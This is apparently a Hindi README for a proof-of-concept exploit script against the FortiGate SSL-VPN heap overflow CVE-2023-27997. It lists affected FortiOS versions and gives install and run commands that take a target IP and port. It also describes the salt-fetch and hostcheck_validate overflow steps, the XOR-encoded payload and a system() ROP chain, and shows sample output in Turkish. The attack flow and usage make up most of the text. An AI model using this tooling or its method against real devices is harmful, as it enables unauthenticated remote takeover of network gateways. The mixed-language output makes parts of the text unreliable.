
FortiGate SSL-VPN CVE-2023-27997 एक्सप्लॉइट PoC स्क्रिप्ट ROP Chain के साथ
FortiGate SSL‑VPN CVE‑2023‑27997 ROP चेन के साथ एक्सप्लॉइट PoC स्क्रिप्ट
fgt-cve-2023-27997-exploit.py, Fortinet FortiGate उपकरणों में खोजी गई गंभीर सुरक्षा भेद्यता CVE‑2023‑27997 के लिए लिखी गई एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट स्क्रिप्ट है।
यह भेद्यता, FortiOS SSL‑VPN इंटरफ़ेस में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) की अनुमति देने वाली heap-आधारित बफर ओवरफ़्लो त्रुटि के कारण उत्पन्न होती है।
स्क्रिप्ट के कार्य चरण:
/remote/hostcheck_validate एंडपॉइंट पर छेड़छाड़ किया गया GET अनुरोध भेजकर मेमोरी ओवरफ़्लो ट्रिगर करता है।ध्यान दें: स्क्रिप्ट का उपयोग केवल अधिकृत परीक्षण या प्रयोगशाला वातावरण में किया जाना चाहिए।
| उत्पाद | संस्करण |
|---|---|
| FortiOS | 7.2.0 – 7.2.5 7.0.0 – 7.0.11 6.4.0 – 6.4.12 6.2.0 – 6.2.14 6.0.0 – 6.0.16 |
| FortiProxy | संबंधित संस्करण |
pip3 install -r requirements.txt
requirements.txt की सामग्री:
requests urllib3
python3 fgt-cve-2023-27997-exploit.py <TARGET_IP> <TARGET_PORT>
उदाहरण:
python3 fgt-cve-2023-27997-exploit.py 192.168.1.200 10443
| तर्क | विवरण |
|---|---|
<TARGET_IP> | लक्ष्य FortiGate IP पता |
<TARGET_PORT> | SSL‑VPN पोर्ट (default: 443 या 10443) |
[*] FortiOS 7.0.5 CVE-2023-27997 ROP Chain Ping Exploit Başlatılıyor...
[+] Salt alındı: 749a2b77
[+] Enc parametresi oluşturuldu (1024 karakter)
[!] 500 Internal Server Error - Bellek taşması veya crash olabilir!
/remote/info --> salt değeri alınır
/remote/hostcheck_validate?enc=<payload> --> buffer overflow tetiklenir
enc पैरामीटर, salt + seed के संयोजन से उत्पन्न XOR keystream के साथ एन्क्रिप्ट किया जाता है।| चरण | Gadget | विवरण |
|---|
| 1 | pop rdi ; ret | RDI में कमांड पता लोड होता है |
| 2 | system@plt | कमांड निष्पादित होती है |
| – | 0xdeadbeefdeadbeef | प्लेसहोल्डर; वास्तविक पता प्रयोगशाला वातावरण में निर्धारित किया जाना चाहिए |
यह PoC, नियंत्रित परीक्षण वातावरण में heap grooming की आवश्यकता के बिना काम करने के लिए डिज़ाइन किया गया है।